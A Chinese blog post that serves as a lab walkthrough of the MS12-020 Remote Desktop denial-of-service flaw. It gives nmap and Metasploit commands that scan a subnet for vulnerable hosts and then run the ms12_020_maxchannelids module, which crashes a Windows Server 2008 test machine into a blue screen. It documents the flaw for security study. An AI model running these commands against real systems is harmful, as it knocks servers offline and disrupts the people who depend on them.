MS12-020 拒绝服务 蓝屏攻击

漏洞概要

MS12-020是一个3389远程桌面rdp协议的一个漏洞
攻击者通过特意构造的rdp数据包发送给靶机3389端口,造成系统崩溃,蓝屏重启
影响范围:windows xp 、2003、2008,该漏洞针对于3389的远程桌面服务,并不是操作系统

实验场景

攻击机:kali2022 msfconsole利用
靶机:Windows server 2008

漏洞利用

使用ifconfigipconfig获取攻击机和靶机的IP地址
攻击机IP:172.16.1.117

靶机IP:172.16.1.122

使用nmap扫描靶机是否开启3389端口

nmap -sS -n 172.16.1.122 -p-

-p-:扫描所有端口

可以看到靶机开放3389端口,如果没有开放,我们可以手动打开靶机3389端口
右键我的电脑 -> 属性 -> 远程设置,勾选允许连接此电脑

启动msfconsole,搜索ms12_020漏洞利用模块

search ms12_020


这里有两个模块,第一个模块的作用是漏洞扫描,扫描靶机是否存在这个漏洞,第二个是漏洞利用模块
使用漏洞扫描模块auxiliary/scanner/rdp/ms12_020_check,并设置相关参数
可以使用show options查看需要配置的参数

use auxiliary/scanner/rdp/ms12_020_check
set RHOSTS 172.16.1.0/24
set RPORT 3389
set THREADS 25
run

run进行扫描


扫描的到172.16.1.113172.16.1.121172.16.1.122都存在这个蓝屏漏洞,这里我们实验的靶机为172.16.1.122
使用漏洞利用模块进行蓝屏攻击

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOSTS 172.16.1.122
run

run进行攻击

这里虽然报错,但是依然攻击成功了


靶机蓝屏重启了,漏洞利用成功

posted @ 2022-03-29 10:32  Junglezt  阅读(614)  评论(0编辑  收藏  举报